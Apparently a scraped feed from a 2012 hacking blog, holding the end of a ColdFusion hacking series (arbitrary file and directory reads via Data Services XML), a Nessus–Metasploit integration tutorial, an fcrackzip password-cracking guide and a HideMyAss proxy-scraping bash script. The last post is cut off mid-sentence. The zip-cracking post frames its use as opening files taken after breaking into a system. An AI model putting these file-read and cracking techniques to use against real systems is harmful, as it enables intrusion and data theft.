Simply replace '<b><INSERT_PATH/FILE_HERE></b>' with the path to read an let the requests rip, like so:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/2aBHg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="http://i.imgur.com/2aBHg.png" width="400" /></a></div>
<br />
<br />
Now the cool thing here is that it works regardless of OS, since it is due to how the Data Services are handling and parsing the XML data being passed, just make sure you request the proper file type for designated system type (check server response if you have no idea)...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/LM3tR.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="http://i.imgur.com/LM3tR.png" width="400" /></a></div>
<br />
<br />
Also in addition to reading files, you can simply pass a directory and it will spit back the directory content, making it very easy to map things out and find files worth reading. Now limited privileges may restrict some file reading but still plenty enough to cause trouble, enumerate lots of info, and possibly even read the site configuration details...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/m7GUf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="http://i.imgur.com/m7GUf.png" width="400" /></a></div>
<br />
In addition to these named exploits in this Cold Fusion series, the same old usual suspects are still fair game here. SQL injection vulnerabilities just as common as on PHP or ASP based sites, and 'cfincludes' can enable source disclosures. In many cases the db can be compromised and Java commands maybe leveraged to further extend the potential attack vectors and escalation platform from that of a standard injection so keep your eyes out and don’t be afraid to take on a new site just cause it has .CFM or .JSP files instead of the oh so popular .PHP or .ASP. Hope you enjoyed this short series on hacking Cold Fusion Servers. All material for the series was available on the net in various places, all I did was wrap it up for you and try to make it a little easier to understand. If you have any questions or suggestions please post em here or let me know via PM.<br /><br />Until next time, Enjoy!<br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
foo<br />
<br />
<br />
<br />
barHRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com1tag:blogger.com,1999:blog-8671806905307905831.post-83025320437973596032012-10-13T22:39:00.001-05:002012-10-13T22:39:05.531-05:00Nessus Part II: Integration with MetasploitPreviously I showed you how to install Nessus vulnerability scanner on your Linux system and run some basic scans. Today I would like to show a few more steps on how you can make the most of this and import your scan results directly into Metasploit, as well as how you can actually run the entire scan from within Metasploit itself. You will need to read the previous write up if you are unfamiliar with Nessus, it can be found <a href="http://kaoticcreations.blogspot.com/2012/07/how-to-install-nessus-5-on-linux.html">here</a>. Assuming you have the basics down we can now begin....<br /><br />Prerequisites:<br />
<ul>
<li>A Vulnerable Machine (Metasploitable 2.0 being used for today's demo, download available <a href="http://sourceforge.net/projects/metasploitable/">here</a> </li>
<li>Stable up to date Metasploit installation, see here if you need some help gettting started you can see this <a href="http://kaoticcreations.blogspot.com/2012/07/how-to-install-metasploit-on-ubuntu.html">here </a></li>
<li>Nessus v5 fully installed and running</li>
<li>Nessus scan profiles and scan types already setup as well as a already completed scan</li>
<li>a little patience</li>
</ul>
In some cases this approach is also useful to those who like to work in teams as one person can conduct a scan and then pass the results file to another team member who can then follow the coming instructions to import the results directly into their own local MSF database for continued efforts. The key for now is you have a finished report. OK, I will start where I last left off in the previous Nessus write-up which was with a completed vulnerability scan already done on the Metasploitable 2.0 virtual machine from Rapid7 team. If you still have Nessus up in the browser you should be looking at a completed scan report, similar to this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/l84Da.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="http://i.imgur.com/l84Da.png" width="400" /></a></div>
<br />
Click on 'Download Report' in the upper right corner and choose the ".nessus" format which is easily imported and parsed by Metasploit. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/BOxqg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="http://i.imgur.com/BOxqg.png" width="320" /></a></div>
<br />
Since I am using Metasploitable 2.0 for my target, my report file is now saved on Desktop as "nessus_report_Metasploitable_2.0.nessus" and now we can shift our attention to Metasploit. You will need to fire up the old MSFCONSOLE to get started. Once you have Metasploit started you need to make sure your database is connected so you can actually store what you import, you can use 'db_status' command to confirm database connection status...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/urkLz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="http://i.imgur.com/urkLz.png" width="320" /></a></div>
<br />
Now we issue the 'db_import' command and point it at the file you want to import. <br /><br /><b>COMMAND:</b> db_import /path/to/your/nessus_report.nessus<br /><br />You can use this feature for more than just Nessus by the way, it currently supports a wide variety of tools like Acunetix, Amap, Burp Suite, NeXpose, NMAP, OpenVAS and a few more (issue 'db_import' with no arguments to see a full list). You should see a message indicating your import was successful or not, hopefully it was :) You can verify the imported details by use of the 'hosts' , 'services' and 'vulns' commands which will show what is currently in the database, like so:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Lo8oY.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="http://i.imgur.com/Lo8oY.jpg" width="400" /></a></div>
<br />
<b>SIDE-NOTE</b>: You can share scan results from other tools like NMAP scans by following the same steps, although for NMAP you might use 'services' instead of 'vulns' to see the results. You can also scan directly from within MSF by simply using the 'db_nmap' command followed by your usual NMAP syntax and results will be stored directly into the database for continued reference and use.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/6d1wS.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="http://i.imgur.com/6d1wS.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/NcSwI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="http://i.imgur.com/NcSwI.png" width="320" /></a></div>
<br />
OK, this covers how to import things from previously run scans as well as any other supported tool which has ability to parse output in a format MSF can use (usually XML based). <br /><br />Now to see how we can actually run the Nessus scan itself directly from within the MSFCONSOLE. We can delete our imported results by simply issuing the 'hosts -d <TARGET-IP>' which will remove all records for this host IP which is contained in the database from the previous steps. Now we can start fresh and run from the console and check the database for results when its all said and done. First we need to load Nessus plugin since it is not loaded by default. This is done by simply issuing the following command:<br /><br /><b>COMMAND:</b> load nessus<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/932uq.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="http://i.imgur.com/932uq.png" width="320" /></a></div>
<br />
Now you can issue the suggested 'nessus_help' command to see all the options that are available to use...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/7TfNh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="http://i.imgur.com/7TfNh.png" width="400" /></a></div>
<br />
OK, so Nessus plugin is now loaded into MSFCONSOLE but it is not actually connected yet. We now need to actually connect MSF to the running Nessus server. We can accomplish this with the 'nessus_connect' command and a set of valid credentials for Nessus, syntax like so:<br /><br /><b>COMMAND: </b>nessus_connect userName:Password@<NessusServerIP>:8834 ok<br /><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/6IyxU.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="57" src="http://i.imgur.com/6IyxU.png" width="640" /></a></div>
<br />
<b>NOTE:</b> the 'ok' at the end to avoid issues with connecting due to certs<br /><br />Now we are connected, we need to setup our scan as we would do in the Browser based GUI configurator. We can check the available scan "policies" by issuing the 'nessus_policy_list' command. You will need to take note of the policy ID number for the scan type you want to run as we will use it in a sec to launch the actual scan...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/eUavi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="http://i.imgur.com/eUavi.png" width="400" /></a></div>
<br />
<b>NOTE:</b> It's odd but the actual '-' prefix to each number should be used to identify the ID :p<br />
<br />
Now to launch the actual scan we put it all together:<br /><b><br />COMMAND:</b> nessus_scan_new <policy id> <scan name> <targets><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/GyHTm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="24" src="http://i.imgur.com/GyHTm.png" width="640" /></a></div>
<br />
After you initiate the scan Metasploit doesn't try to bother you with a lot of verbose junk since they know your console space is valuable, so it runs in background and with the Nessus Server. In order to check if the scan is still running you can issue the 'nessus_scan_status' command with no arguments. You will be presented with a table of active running scans if still running otherwise it will simply state that there are no scans running, like so:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/p9n7L.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="http://i.imgur.com/p9n7L.png" width="400" /></a></div>
<br />
<b>NOTE: </b>if you need to pause a scan for some reason you can issue the 'nessus_scan_pause <scanid>' command which will pause your scan. <br /><br />Once your scan has finished you might notice that the results have not yet actually been imported into Metasploit's database. This is because they are still on the Nessus server we connected to. We need to import them as we learned earlier so that everything pulls in. In order to do it this time we will use the Nessus plugin to handle it. You can issue the 'nessus_report_list' command to see a list of finished reports available to download and import, again you need to take note of the ID for the one you wish to work with. Once you know, you simply get it with the 'nessus_report_get' command followd by the report ID., and now we have a scan run from completely within MSFCONSOLE and all results fully populated in the MSF database of our choosing. You can now take your time to search through the results and what is available in Metasploit to exploit each finding.<br />
<br />
Hope you enjoyed this follow up to the previous Nessus write-up. I referenced it before and received a few questions so hopefully this covers things in enough details to get you on your way. More to come soon, so stay tuned and until next time - Enjoy!<br />
<br />HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com1tag:blogger.com,1999:blog-8671806905307905831.post-68281371569338240252012-10-03T13:29:00.000-05:002012-10-03T13:29:11.129-05:00Cracking Password Protected Zip Files on Linux with FCRACKZIPI recently was given the keys to the castle and once inside I did the usual snooping around and well in the end I found myself with a collection of password protected Zip files that I knew had all kinds of juicy info inside. Now I have cracked protected Zip files in the past on Windows using a few tools some friends of mine made, but I had never done it since I had moved to my new Linux setup. I decided to make a little tutorial out of the whole incident for anyone interested or in a similar situation. In my search and review I ended up using a tool called FCRACKZIP, and this will be the focus for today's writeup. They actually support a Windows binary version which syntax should be identical to what your about to read. You can download the appropriate package for you from the makers homepage here: <a href="http://oldhome.schmorp.de/marc/fcrackzip.html">FCRACKZIP</a>. <br />
<br />
If you are on a Linux machine you can install it using apt-get, like so:<br />
<br />
<b>COMMAND:</b> sudo apt-get install fcrackzip<br />
<br />
Now if you have some protected Zip files laying around then that's great, but if you don't you can perform a quick command to make one. Here is the syntax and quick example:<br />
<br />
<b>COMMAND:</b> zip --encrypt -r <ArchiveName> </target/U/want/2/zip><br />
<b>EXAMPLE: </b>zip --encrypt -r sup3rs3cr3t /home/hood3drob1n/Desktop/fcrackzip-TuT.txt<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/soQrw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="http://i.imgur.com/soQrw.png" width="400" /></a></div>
<br />
<br />
You will get a prompt after you hit enter which will ask you to type in the password, and then again to confirm it. You should then have a password protected Zip file to use for further testing.<br />
<br />
First, as with any tool, we start by quickly reviewing the documentation and then the help menu. Here is quick shot of the main features as outlined in the help menu:<br />
<br />
<b>COMMAND: </b>fcrackzip --help<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ogCMb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="http://i.imgur.com/ogCMb.png" width="400" /></a></div>
<br />
<br />
I will note since it may not be clear at first that the '-c' charset option has a few options which will aid you if you are going to perform a straight bruteforce attack on the password:<br />
<b>a =></b> lower aplha charset [a-z]<br />
<b>A =></b> UPPER aplha charset [A-Z]<br />
<b>1 =></b> numerical charset [0-9]<br />
<b>! =></b> Special charset [!:$%&/()=?[]+*~#]<br />
<b>: =></b> Used to mark additional characters to add into the charset<br />
<br />
You should typically start with a wordlist and then move to bruteforcing after. In order to perform Dictionary based attack just point it at the wordlist and zip file you want to crack open:<br />
<br />
<b>COMMAND: </b>fcrackzip -D -p 500-worst-passwords.txt -u -v --method 2 sup3rs3cr3t.zip<br />
<b> => </b>try to cracking using 500-worst-passwords.txt as our pass list<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/rXF8J.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="http://i.imgur.com/rXF8J.png" width="400" /></a></div>
<br />
<b>NOTE: </b>I experienced app crashes if I didn’t place the password list in same location i was running fcrackzip from so just do some copying or moving if you experience similar issues to work around the issue...<br />
<br />
Once you have exhausted your wordlist options you can move to bruteforce attacks. Now you can use the '-l <min>-<max>' option to set the min and max password lengths for bruteforce attacks, or you can use the '-p' init option to set the default value and starting string for cracking, for example:<br />
<br />
<b>COMMAND: </b>fcrackzip -b -c a -l 1-8 -u -v sup3rs3cr3t.zip<br />
<b>=></b> bruteforce attack using the lower aplha charset, testing for lengths 1-8<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/7F3xU.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="http://i.imgur.com/7F3xU.png" width="400" /></a></div>
<br />
<b>NOTE: </b>use of the '-u' option cuts down on the false positives as it actually tries to unzip the file using the password. It may increase load and time a little but will greatly cut down on false detections. I highly recommend using this option for pretty much all attacks...<br />
<br />
Another example using a bruteforce attack against a fixed length via the -p/init option. It works like so:<br />
<br />
<b>COMMAND: </b>fcrackzip -u -c a1 -p saaaaa sup3rs3cr3t.zip <br />
<b> => </b>test a-z0-9 but only for those of 6 char in length, starting at string 'saaaaa'<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/kwrx0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="http://i.imgur.com/kwrx0.png" width="400" /></a></div>
<br />
This sums up the general usage of fcrackzip and you should now be on your way to opening up all those pesky zip files you don't seem to have passwords for. I'm sure there are other tools out there, but this one worked well for me so thought I would share....<br />
<br />
Until next time, Enjoy!HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com13tag:blogger.com,1999:blog-8671806905307905831.post-8987313057832847722012-08-27T18:04:00.000-05:002012-08-27T18:04:34.475-05:00How to Build Your Own HideMyAss Proxy Scraper in BashI have received a number of emails from folks regarding my lack of maintaining of my free proxy list pages. A few of the emails were down right rude and offensive, but hey it is they way of the net I suppose. Everyone wants to be a telephone or internet gangster....In an effort to help those who care and don’t mind a little effort I thought I would do my best to provide a easy solution to your proxy needs. I decided I will share a bit of bash knowledge and let you get your own. Give a man a fish and he will eat for a day, but teach a man to fish and he will eat for life........<br /><br />Today we will have a little fun and go over some bash basics which when put together can yield us a powerful proxy scraping script we can use to gather fresh proxies whenever we need. You can apply the concepts to other scripts to interact with the web in all sorts of fun ways. Hopefully you walk away with a cool script and if I am lucky a little bit of knowledge as well. This will not be a full bash tutorial but I will explain most of it as we go along, and I will provide some helpful reference links at the end to help you out if you are new and need or just want to learn more. Here goes.......<br /><br />In order to start any Bash script we need to first start it out with a Shebang! followed by path to Bash (i.e. #!/bin/bash). This lets the system know that it should use the Bash interpreter for everything that follows. Bash Shell is included on most, but not all, Linux Operating Systems. In most cases the same concepts will apply to other shells as well (Ksh, Dash, etc) however there may be some syntactical differences, in which case you can consult the error messages and your shells man page for likely solutions. In our case our first line Shebang looks like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/VJ3Wc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="97" src="http://i.imgur.com/VJ3Wc.png" width="400" /></a></div>
<br />
<b>NOTE: </b>you will need to save this with whatever name you want. The traditional bash script file ending is ".sh". You should also make your script executable after saving it using the 'chmod' command (chmod +x whatever.sh).<br />
<br />
We can use the '#' character to indicate comments through the end of the line. People often use this to leave comments throughout the script to let others know what is going on or how to use it. If your placing comments in the body of source they should help indicate the purpose of functions being used in case you forget, it is also good for pointing out areas for option user configurations - but keep them to a minimum if possible. We can add a quick comment to indicate this is a HMA Proxy Scraper Script. In addition to a general description comment I like to start most of my scripts off with a quick and simple function for handling system interrupts (i.e. CTRL+C). This can be handy for scripts which have a lot of moving parts and need to be winded down rather than a cold stop, or if cleanup activities are requires prior to exiting). We can do this with the 'trap' command followed by our function name which will handle these signals, and INT for interupt signal to be trapping. We then build a function() which will be a series of commands run if the function is called. Functions allow us to keep our code cleaner and organized. It also can allow us to re-use commonly repeated chunks of code rather than repeatedly re-typing the same code through the script every time it is needed. I also like to have my bashtrap() function exit with a status code other than 0, sicne most programs use the exit code to judge whether a script or command was executed successfully (0=success, anything other than 0=not success). Our base now looks like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/LRuIm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="http://i.imgur.com/LRuIm.png" width="400" /></a></div>
<br />
So now anytime the Interrupt or CTRL+C is sent by system it will trigger the bashtrap() function which will then use the 'echo' command to print message to output (terminal in most cases) and let the user know it has been received and that things will be shutting down. The echo command will print anything that follows. When using you echo you need to be aware of its options if you don’t want to create new lines with every use or for handling of special characters or strings. you also need to be very aware of quoting in bash scripts as different quoting can result in different interpretations of the same code due to how bash expands things based on interpretation due to the quoting structure. Now that we have our first trap function out of the way we will want to create a banner of sorts to greet our user or to let them know the script has properly started. <br /><br />In order to make a simple greeting message we will focus on using echo command to print our message in the terminal for the user to see. We can use 'grep' command which is designed to look for strings in text to help us add a little color to our script text as well (a crude highlighter system). Echo will print our message to the screen and we will use a pipe "|" to carry our message through to the next command for processing, which is grep in this case. We can use the '--color' option of the grep command to highlight our string if found. The grep command can be very useful for finding a needle in a hay stack, as we will see more of in a few. Our script + our new simple welcome message ends up looking something like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/WC2Sm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="http://i.imgur.com/WC2Sm.png" width="400" /></a></div>
<br />
OK, now we have the bases out of the way its time to start getting some things done. Now our goal is to be able to get a list of usable proxies from the HideMyAss free and always fresh proxy list. Once you have the concepts down you can apply the same methodologies to scrape pretty much any other site for whatever it is you want. OK, so first we need to identify our target page or page range that we will want to consistently get information from. In most cases I do some good old fashioned web surfing in any old browser to find the magic page. In our case it is http://www.hidemyass.com/proxy-list/ and if we look at the bottom of the page there are actually up to 35 pages of proxies available. Now you can use many tools in Linux from the command line to fetch things from the web (WGET, GET, Lynx, Curl, etc), but I will be using Curl for my purposes as I find it the easiest and most configurable which makes it great for combining with bash to tackle the web. Curl itself has entire books written about it and its various usage, and the libcurl version is used all over the place as well (PHP, C, etc). We will use it to grab the source from our target page and then we will use Linux system tools and bash kung-fu to check and extract the proxy addresses. In the end we will have a script which scrapes the site and places all proxies in a file for safe keeping while also printing them all out in terminal for user to see. We will also keep things clean and sort the final results to ensure there are not any duplicates in there. The process from start to finish takes time and lots of patience as some sites anti-scraping methods can leave you with headaches for days while you try to figure them out, other times things can go very quickly (literally in minutes). <br /><br />We will start by sending a curl request for the base page of proxies which should contain the most recent postings on their site and then work from there. Curl takes the site as a mandatory argument and then you can add optional arguments after the site. In today's purpose we will need to keep a cookie file since HMA has decided to use cookies as a base guard. If you don’t want to use a file for capturing and instead want to use a known cookie value you can do that too by simply indicating the cookie name and its value. In addition to cookies we will want to add some options to our request to handle common network congestion problems which might occur like setting retries, the delay between retries, the connection timeout and my favourite the '-s' argument which puts things into silent mode and removes a lot of un-needed text from the terminal which is presented as files are received (good for keeping our script looking clean when run). If you need or want you can also add in additional HTTP Header fields, user-agent, and referrer values (handy for spoofing things as well). In some cases while building a new script you might want to redirect the basic output from a command to a local file for some base testing prior to placing in full blown script and running, but its up to you. If you use local proxies (Burp, ZAP, TamperData, etc) this is also very helpful in building the curl requests since you have the ability to capture the entire HTTP request which can then be directly used to create the same request with curl. Make sure you read the curl help info multiple times and run through the basic tutorials they offer on the curl main site, it all comes in handy the more you use it. Here is what my base request looks like after using a local proxy to help me identify the cookie value which was mandatory to view the page when using curl ($PHPSESSID):<br />
<br />
Request to main page, using set cookie value, and spoofed referrer indicating we came from the main proxy page, as well as some helpful timing options:<br /><br /><b>COMMAND:</b> curl http://www.hidemyass.com/proxy-list/1 -b "PHPSESSID=f0997g34g7qee5speh0bian143" --retry 2 --retry-delay 3 --connect-timeout 3 --no-keepalive -s -e "http://www.hidemyass.com/proxy-list/" 2> /dev/null > o.txt<br /><br /><b>OR </b>you could use the -c <file> option to place all cookies received into a file which can be used by curl to further access if needed:<br /><br /><b>COMMAND:</b> curl http://www.hidemyass.com/proxy-list/1 -c cookiejar --retry 2 --retry-delay 3 --connect-timeout 3 --no-keepalive -s -e "http://www.hidemyass.com/proxy-list/" 2> /dev/null > o.txt<br /><br />If you open o.txt file now you will find it is full of the source code from the main proxy page which we grabbed using above curl command. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/5PMuM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="http://i.imgur.com/5PMuM.png" width="400" /></a></div>
<br />
If you used the '-c cookiejar' option you can open the file 'cookiejar' which was created upon the request being made and you will see a listing of any cookies set during the process, like so:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/446YQ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="http://i.imgur.com/446YQ.png" width="400" /></a></div>
<br />
The first thing you may notice is that the IP addresses are not just simply put in there for us to grab (like they might appear in browser view), we are going to have to work for them. Take a minute to review the source, compare to browser version if you like and eventually you will realize that the key pieces which contain the IP addresses for the proxies appears to be contained within these sections of HTML code. We will now use the 'grep' command to help us chop this page down a bit in size to make things a little easier and limit to just the workable sections we want. It is all about baby steps for this kind of stuff....<br /><br />I noticed that in each section of text I am interested in I find the a recurring string "<div style="display:none">". We will use this string with the grep command to eliminate all other lines which don't contain this. Now in reviewing I also noticed that it looks like I am going to need the port which seems to be 2 lines below the one I want to find with grep. No worries, we can use the '-A' argument within grep to grab the 2 lines after each section matching our string (-B option grabs before the line containing string). Now we should be able to limit things to just the sections we are interested in using grep + the -A option. The curl piece now look like so:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Or7it.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="http://i.imgur.com/Or7it.png" width="400" /></a></div>
<br />
If you now open o.txt file you will find it has been extremely cut down in size in comparison to the first source code pulled with our first request above and now contains a repeated format we can continue winding down and working with. Now to get things cleaned up a bit more we will need to use another Linux system tool named 'sed' which is a powerful stream or text editor. We can use sed to find strings similar to grep but we can also use sed to manipulate the strings we feed it (delete, replace, etc). We will use this to our advantage to clean things up and remove a lot of the HTML tags which are in our way. Sed requires its own tutorials if you are unfamiliar as there is a lot to it but its easy enough to pick up so don’t be scared, some links at the end should help. Since we don’t have HTML parsing classes like other scripting languages we just need to be patient and remove things one by one until we have it the way we want it. You can chain sed commands together (sed -e cmd1 -e cmd2 ... OR sed cmd1;cmd2;...) or even place them all in a file and call to run in a series which means we can do a lot with a little if structured properly. <br /><br />I will start by removing the many of the closing style '</style>' tags which are scattered throughout. Notice that we have to escape certain characters when providing our string to sed. In this case we escape "/" with "\" since we are using as our marker and we dont want sed to interpret it as end of string early '<' only instead of the full <\style>.<br />
<br /><b>COMMAND:</b> sed -e 's/string/replacement/g'<br />
s = swap, g = globally or for all occurrences instead of just the first one<br />
<br /><b>COMMAND:</b> sed -e 's/<\/style>//g'<br /><br />This '<\style>' tag appears as first thing on lines which have our IP addresses. This will swap (s) or replace the '<\style>' tag with nothing and since we used the (g) option it will replace in all occurrences it is found within our target stream or text (we will pipe it in via our script and adjust the output on the fly). We will continue removing basic tags and items which stand in our way using the following sed chain: <br />
<br /><b>COMMAND: </b>sed -e 's/<\/style>//g' -e 's/\-\-//g' -e 's/ <td>//g' -e '/^$/d' | sed -e 's/_/-/g'<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/NjopG.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="http://i.imgur.com/NjopG.png" width="400" /></a></div>
<br />
Now this gets us down a little more but if you review the source you begin to realize that the IP address is scrambled in with some random numbers. They are using some anti-scraping techniques to try and trick us, or give us a hard time at a minimum. In order to work around this, we will replace the chosen target strings with a marker instead of simply removing completely (as we did in the last step). You will see in a minute this will help us tremendously in identifying which numbers are usable and which are decoy. Lets now use the same technique used above to replace the main HTML <span> and <div> tags and everything in them with '~' characters which we will use as markers for coming steps. Now we will use bash expansion powers to our advantage since we can't write a blanket statement since there seems to be some variations within the tags themselves as to how they are formatted. Here is what I came up with to do this piece:<br />
<br />
<b>COMMAND:</b> -e 's/<span class="[a-zA-Z\-]\{1,4\}">/~/' -e 's/<div style=\"display:none\">/~/g' -e 's/<span class=\"[a-zA-Z0-9\-]\{1,4\}\">/~/g' -e 's/<span class=\"\" style=\"\">/~/g' -e 's/<span style=\"display: inline\">/~/g' -e 's/<span style=\"display:none\">/~/g'<br />
<br />
Let me explain one of the funny looking pieces in case it isn't fully clear: <br />
<b>COMMAND:</b> sed -e 's/<span class="[a-zA-Z\-]\{1,4\}">/~/'<br />
<br />
This piece above will replace anything which falls into the "<span class="XXX">", where XXX is anything from a-z or A-Z including the '-' character, and is 1 to 4 characters in length. i.e. abc2, 23x-, xX-1, and many more would all be valid matches. This is because the class name seems to change at random, but to our advantage it remains within a known char-set [a-zA-Z\-] and of a predictable length {1, 4}.<b> NOTE </b>that we use the '\' before the '-' character and the curly braces '{' & '}' to escape it so that bash itself doesn’t improperly interpret its meaning. You need to do this when working with special characters or you may end up with results you were not expecting.<br /><br />Once we place our markers things start to look like the end is near....<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/bUdrR.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="http://i.imgur.com/bUdrR.png" width="400" /></a></div>
<br />
We're getting so close....a bit more HTML tag cleanup, this time back to straight removal or a swap with nothing technically....<br />
<br /><b>COMMAND: </b>sed -e 's/<\/div>//g' -e 's/<\/span>//g' -e 's/<\/td>//g' -e 's/<span>//g' <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/E11Ks.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="http://i.imgur.com/E11Ks.png" width="400" /></a></div>
<br />
OK, now we have something workable. Before we move to trying to decipher our results we need one last bit of cleanup to remove any instances of the '~' character, where it occurs as the first thing on the line (any other occurrences will be left alone, only when it is the first character of line will be affected). We will use the '^' character to signal the start of line (see sed man page and reference links at end for full details on usage and ^ and & character special meanings)...<br /><br /><b>COMMAND: </b>sed -e 's/^~//g'<br />
<br />
<b>COMMAND: </b>curl http://www.hidemyass.com/proxy-list/1 -b "PHPSESSID=f0997g34g7qee5speh0bian143" --retry 2 --retry-delay 3 --connect-timeout 3 --no-keepalive -s -e "http://www.hidemyass.com/proxy-list/" 2> /dev/null | grep -A2 '<div style=\"display:none\">' | sed -e 's/<\/style>//g' -e 's/\-\-//g' -e 's/ <td>//g' -e '/^$/d' -e 's/_/-/g' -e 's/<span class="[a-zA-Z\-]\{1,4\}">/~/' -e 's/<div style=\"display:none\">/~/g' -e 's/<span class=\"[a-zA-Z0-9\-]\{1,4\}\">/~/g' -e 's/<span class=\"\" style=\"\">/~/g' -e 's/<span style=\"display: inline\">/~/g' -e 's/<span style=\"display:none\">/~/g' -e 's/<\/div>//g' -e 's/<\/span>//g' -e 's/<\/td>//g' -e 's/<span>//g' -e 's/^~//g' > o.txt<br />
<br />
OK, now we have a base but it still needs some work. We now have, starting at line 1, the IP on every other line with the associated PORT on the following line. The IP lines still have the anti-scrape random digits in there as well. In order to work around this I decided to use a WHILE loop to run while we read the source code from HMA page we have stripped down in early stages (o.txt). In the loop while we are reading each line we will use a few variables, some variable incrementation tied to if statements which will helps us perform the appropriate actions depending on whether or not we are working on an IP or PORT line. The PORT is rather simple to pull since it is now standing on its own. The IP address we will need to pull piece by piece. In order to grab the IP we will introduce another great Linux system tool which is 'awk'. Awk is another text and stream editor with some built in features allowing it to get rather complex and powerful (on its own and even more so when paired with grep, sed, and other scripts and tools). <br /><br />I set each piece of the IP to its own variable ($IP1-4) and one for PORT as well, we set them to NULL values prior to filling them to avoid issues. We create a simple count for 1 or 2 and after running commands for 2 we will reset the count to keep us on track and in rotating manner since we have things on every other line. We set a base variable for the count and set it to a value of 0. We cat the file we dumped source to and pipe it to the while read loop setting each line to the variable named 'line'. You can set it to anything you like, most people just use line since you are usually reading it line by line. Since we start with IP on line 1 and PORT on line 2 we can use this for our count system, if 1 process IP variables, if 2 process PORT variable. In order to get the IP properly we will simply run 4 different processes to strip out each part of the IP address using awk. The markers we placed earlier (~) will help us along with the fact that we know each section of the IP address follows the '.' character splitting it from the previous and we also notice that the first set of digits is always the real start to the IP. We use echo to print the current line, we then use awk to process since we can use its '-F' option to set the Field Separator which is how awk identifies fields or columns to which it places into positions for printing by referencing appropriate positioning variable. We throw in a little sed to remove our markers and when we do this 4 times taking note of the '.' and '~' characters as we work and end up with an variables we can piece back together to form the real IP addresses. Once we have all the 